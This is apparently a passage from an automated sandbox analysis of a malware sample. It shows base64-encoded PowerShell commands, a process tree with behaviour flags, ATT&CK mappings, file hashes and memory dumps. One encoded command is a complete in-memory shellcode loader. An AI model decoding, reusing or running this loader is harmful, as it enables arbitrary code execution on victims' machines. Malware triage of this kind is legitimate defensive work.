AdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADkAVABEACkAKQA7ACQATwAzAFgAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABXAGYATABnACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFcAZgBMAGcAIAAkAE8AMwBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8AMwBYACAAJABlACIAOwB9AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3492
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABiAE0AWQBIACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYgBNAFkASAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGIALAAwAHgAYwBiACwAMAB4AGIAZgAsADAAeAA5ADcALAAwAHgAOQA4ACwAMAB4ADUANQAsADAAeAAxADAALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZAAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA1ADAALAAwAHgAMwAxACwAMAB4ADcAZAAsADAAeAAxAGEALAAwAHgAOAAzACwAMAB4AGUAZAAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4ADYAMgAsADAAeAA2ADQALAAwAHgAYgBkACwAMAB4ADkAZgAsADAAeAA4AGMALAAwAHgAOQA1ACwAMAB4ADMAZQAsADAAeABjADAALAAwAHgAYgBkACwAMAB4ADQANwAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4AGUAZgAsADAAeAA1ADcALAAwAHgAMgBhACwAMAB4ADYAZQAsADAAeAA4ADQALAAwAHgAYwBhACwAMAB4ADIAMAAsADAAeABmAGEALAAwAHgAYwA4ACwAMAB4AGYAZQAsADAAeAAwADkALAAwAHgAMAAzACwAMAB4AGUAMwAsADAAeAA0ADkALAAwAHgAMgAzACwAMAB4AGQAZAAsADAAeAA3ADAALAAwAHgAYwA3ACwAMAB4ADkAYwAsADAAeAAxADAALAAwAHgANAA2ACwAMAB4ADgANAAsADAAeABlADEALAAwAHgAMwAzACwAMAB4ADMAYQAsADAAeABkADcALAAwAHgAMwA1ACwAMAB4ADkANAAsADAAeAAwADMALAAwAHgAMQA4ACwAMAB4ADQAOAAsADAAeABkADUALAAwAHgANAA0ACwAMAB4AGUAZQAsADAAeAAyADYALAAwAHgAMwBhACwAMAB4ADEAOAAsADAAeAA3AGEALAAwAHgAOQBhACwAMAB4AGQANAAsADAAeAAxADcALAAwAHgAMwBlACwAMAB4ADIANwAsADAAeABkADQALAAwAHgAZgA3ACwAMAB4ADMANAAsADAAeAAxADcALAAwAHgAYQBlACwAMAB4AGEAMAAsADAAeABjAGYALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeAAwADIALAAwAHgAZAAxACwAMAB4ADgAOAAsADAAeAA5ADMALAAwAHgAMQAxACwAMAB4ADkAOQAsADAAeAAzADAALAAwAHgAOQBmACwAMAB4ADcAZAAsADAAeAAzAGEALAAwAHgANAAwACwAMAB4ADQAYwAsADAAeABmADgALAAwAHgAZgAzACwAMAB4ADMANgAsADAAeAA0AGUALAAwAHgANABiACwAMAB4ADMANQAsADAAeAA0ADgALAAwAHgAMgA1ACwAMAB4ADcAZgAsADAAeABiAGUALAAwAHgAYgA3ACwAMAB4AGUAYwAsADAAeAA0AGUALAAwAHgAMAAwACwAMAB4ADEAYgAsADAAeABkADEALAAwAHgANwBmACwAMAB4ADgAZAAsADAAeAA2ADUALAAwAHgAMQA1ACwAMAB4ADQANwAsADAAeAA2AGUALAAwAHgAMQAwACwAMAB4ADYAZAAsADAAeABiADQALAAwAHgAMQAzACwAMAB4ADIAMwAsADAAeABiADYALAAwAHgAYwA3ACwAMAB4AGMAZgAsADAAeABhADYALAAwAHgAMgA5ACwAMAB4ADYAZgAsADAAeAA5AGIALAAwAHgAMQAxACwAMAB4ADgAZQAsADAAeAA4AGUALAAwAHgANAA4ACwAMAB4AGMANwAsADAAeAA0ADUALAAwAHgAOQBjACwAMAB4ADIANQAsADAAeAA4ADMALAAwAHgAMAAyACwAMAB4ADgAMAAsADAAeABiADgALAAwAHgANAAwACwAMAB4ADMAOQAsADAAeABiAGMALAAwAHgAMwAxACwAMAB4ADYANwAsADAAeABlAGUALAAwAHgAMwA1ACwAMAB4ADAAMQAsADAAeAA0AGMALAAwAHgAMgBhACwAMAB4ADEAZQAsADAAeABkADEALAAwAHgAZQBkACwAMAB4ADYAYgAsADAAeABmAGEALAAwAHgAYgA0ACwAMAB4ADEAMgAsADAAeAA2AGIALAAwAHgAYQAyACwAMAB4ADYAOQAsADAAeABiADcALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAA3AGYALAAwAHgAYwA3ACwAMAB4ADAANwAsADAAeAA5AGIALAAwAHgAOAAwACwAMAB4ADkANQAsADAAeAA5AGYALAAwAHgANQAwACwAMAB4ADQAZAAsADAAeAAyADYALAAwAHgANgAwACwAMAB4AGYAZQAsADAAeABjADYALAAwAHgANQA1ACwAMAB4ADUAMgAsADAAeABhADEALAAwAHgANwBjACwAMAB4AGYAMgAsADAAeABkAGUALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAAwADUALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeAAxAGIALAAwAHgAOQA5ACwAMAB4AGQAZgAsADAAeABhADkALAAwAHgANQBjACwAMAB4AGIAMwAsADAAeAAxAGIALAAwAHgAZgBkACwAMAB4ADAAYwAsADAAeABhAGIALAAwAHgAOABhACwAMAB4ADcAZAAsADAAeABjADcALAAwAHgAMgBiACwAMAB4ADMAMgAsADAAeABhADgALAAwAHgANAA4ACwAMAB4ADcAYwAsADAAeAA5AGMALAAwAHgAMAAyACwAMAB4ADIAOQAsADAAeAAyAGMALAAwAHgANQBjACwAMAB4AGYAMgAsADAAeABjADEALAAwAHgAMgA2ACwAMAB4ADUAMwAsADAAeAAyAGQALAAwAHgAZgAxACwAMAB4ADQAOAAsADAAeABiADkALAAwAHgANAA2ACwAMAB4ADEAYQAsADAAeABiADgALAAwAHgANAAyACwAMAB4ADYAOAAsADAAeABkAGIALAAwAHgAZgA0ACwAMAB4ADcAYgAsADAAeAA1ADgALAAwAHgAZgA1ACwAMAB4AGMANwAsADAAeAA0ADgALAAwAHgAYQA4ACwAMAB4ADIANwAsADAAeAAxADAALAAwAHgAOQA3ACwAMAB4AGUANgAsADAAeAAwADIALAAwAHgANQA5ACwAMAB4AGUANwAsADAAeAA5AGUALAAwAHgAYwA1ACwAMAB4AGIAMQAsADAAeABkADMALAAwAHgAZABlACwAMAB4AGUAOQAsADAAeAAxADcALAAwAHgAOQAwACwAMAB4ADkAZQAsADAAeAAwADkALAAwAHgAZgAyACwAMAB4AGEAZAAsADAAeAA0AGUALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeABiADIALAAwAHgANwBmACwAMAB4AGMANgAsADAAeAA4AGQALAAwAHgANQA0ACwAMAB4ADEANQAsADAAeABlADYALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeAA4ADEALAAwAHgAOQBmACwAMAB4ADQAMQAsADAAeAA5AGIALAAwAHgAMwAwACwAMAB4ADUAZgAsADAAeAA1AGMALAAwAHgAZQAxACwAMAB4ADcAMgAsADAAeABlAGIALAAwAHgANQAzACwAMAB4ADEANQAsADAAeAAzAGMALAAwAHgAMQBjACwAMAB4ADEAOQAsADAAeAAwADUALAAwAHgAYQA4ACwAMAB4AGUAYwAsADAAeAA1ADQALAAwAHgANwA3ACwAMAB4ADcAZQAsADAAeABmADIALAAwAHgANAAyACwAMAB4ADEAMgAsADAAeAA3AGUALAAwAHgANgA2ACwAMAB4ADYAOQAsADAAeABiADUALAAwAHgAMgA5ACwAMAB4ADEAZQAsADAAeAA3ADMALAAwAHgAZQAwACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgAOABjACwAMAB4AGMANwAsADAAeAAxADYALAAwAHgAMAA4ACwAMAB4ADEAOQAsADAAeABhADgALAAwAHgANAAwACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgAMgA4ACwAMAB4ADkAMAAsADAAeAAyADMALAAwAHgAOAA3ACwAMAB4ADIAOAAsADAAeABmADgALAAwAHgAOQAzACwAMAB4AGYAMwAsADAAeAA3AGEALAAwAHgAMQBkACwAMAB4AGQAYwAsADAAeAAyADkALAAwAHgAZQBmACwAMAB4ADgAZQAsADAAeAA0ADkALAAwAHgAZAAyACwAMAB4ADQANgAsADAAeAA2ADMALAAwAHgAZAA5ACwAMAB4AGIAYQAsADAAeAA2ADQALAAwAHgANQBhACwAMAB4ADIAZAAsADAAeAA2ADUALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABhAGYALAAwAHgANQA5ACwAMAB4ADQAMQAsADAAeABmADcALAAwAHgAYwA1ACwAMAB4AGIAMwAsADAAeAA1ADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAUwBZAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAFMAWQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBTAFkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3044
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0eqf1ybf\0eqf1ybf.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3020
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA95.tmp" "c:\Users\Admin\AppData\Local\Temp\0eqf1ybf\CSCC1139B6278C447188E91489E4586139.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0eqf1ybf\0eqf1ybf.dll

Filesize
3KB

MD5
fe4a3d1bc07dd657f60c329604e3edef

SHA1
738d299a8f859ed7ebccc14295b8010e1292e449

SHA256
8eacf5f902cedb96d8490c6ee72dd44ffecc0bf17650a2207ea0a3f69d831173

SHA512
5592bd7c9ba8aa6e49f7c6acd5db22de4f327e27d1cb5f5ce579ef342f4462029870ea06c59d6d7354368d84b4f07fd69ed1b23c7842819de7f9b78bd024b85a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBA95.tmp

Filesize
1KB

MD5
2324701658c7ed097c106a64243a2eaa

SHA1
11b399c325a5df081bfe6a46065ae9aa989ed03b

SHA256
992bbd4c11594ade1cd2380c4415cb8ef71636c3fda1d738f4371337933bfc7c

SHA512
6770d41b40e62c4fd694d8839981910d1ede655e72057a8adf713de51c4ca19bfd20c7c6b46b0bb0381d8dba76d0c54ea43caa0b15365e69a3e094b459b04c0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v3zh2idc.c2k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0eqf1ybf\0eqf1ybf.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0eqf1ybf\0eqf1ybf.cmdline

Filesize
369B

MD5
b5306982d678a04b9083aae09f76d739

SHA1
31422ce7118b899374bef2f7bc2b3f0d8a42ef9e

SHA256
60eb9ffd5ba3692530f8d821a7532d161a710ae1b0ae246d5855dc1c7e09d681

SHA512
1d084eb1121717c1628ccd852313a8a9e918d9242ea5e19f1d89365f0924b3da146bd2dab88c6efa62c301885779ed5f40b8b3b81489336c867393f32deb20ca

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0eqf1ybf\CSCC1139B6278C447188E91489E4586139.TMP

Filesize
652B

MD5
9ae3632be8c866093ce5cc148f1d875d

SHA1
81f1c8c041c271ee9fd9bc7da5bc6519843b7fe8

SHA256
c0ffae5b200b24df8684818f45df6a70465e3d75333cc01da4be0d7c9dd49bb9

SHA512
81ceb1264ff9c3f2b37be14038bc0593e7807a11e7a311145919c7abfd09a689e53096ec2c689523c01a28d2819d2220a950ed16c6aabbf891147501c15ecef5

Download Submit
memory/3044-15-0x0000000074E4E000-0x0000000074E4F000-memory.dmp

Filesize
4KB

Download
memory/3044-34-0x0000000006990000-0x00000000069DC000-memory.dmp

Filesize
304KB

Download
memory/3044-16-0x00000000033A0000-0x00000000033D6000-memory.dmp

Filesize
216KB

Download
memory/3044-18-0x0000000005BE0000-0x0000000006208000-memory.dmp

Filesize
6.2MB

Download
memory/3044-17-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/3044-19-0x0000000005A90000-0x0000000005AB2000-memory.dmp

Filesize
136KB

Download
memory/3044-21-0x0000000006210000-0x0000000006276000-memory.dmp

Filesize
408KB

Download
memory/3044-20-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/3044-31-0x0000000006310000-0x0000000006664000-memory.dmp

Filesize
3.3MB

Download
memory/3044-32-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/3044-33-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/3044-54-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/3044-35-0x0000000007FB0000-0x000000000862A000-memory.dmp

Filesize
6.5MB

Download
memory/3044-36-0x0000000006EB0000-0x0000000006ECA000-memory.dmp

Filesize
104KB

Download
memory/3044-53-0x0000000074E4E000-0x0000000074E4F000-memory.dmp

Filesize
4KB

Download
memory/3044-51-0x0000000007B30000-0x0000000007B31000-memory.dmp

Filesize
4KB

Download
memory/3044-49-0x0000000006F20000-0x0000000006F28000-memory.dmp

Filesize
32KB

Download
memory/3492-2-0x0000018883B10000-0x0000018883B32000-memory.dmp

Filesize
136KB

Download
memory/3492-12-0x00007FF81EDB0000-0x00007FF81F871000-memory.dmp

Filesize
10.8MB

Download
memory/3492-13-0x00007FF81EDB0000-0x00007FF81F871000-memory.dmp

Filesize
10.8MB

Download
memory/3492-52-0x00007FF81EDB0000-0x00007FF81F871000-memory.dmp

Filesize
10.8MB

Download
memory/3492-14-0x00007FF81EDB0000-0x00007FF81F871000-memory.dmp

Filesize
10.8MB

Download
memory/4056-0-0x0000000000FA0000-0x0000000000FAA000-memory.dmp

Filesize
40KB

Download
memory/4056-1-0x00007FF81EDB3000-0x00007FF81EDB5000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads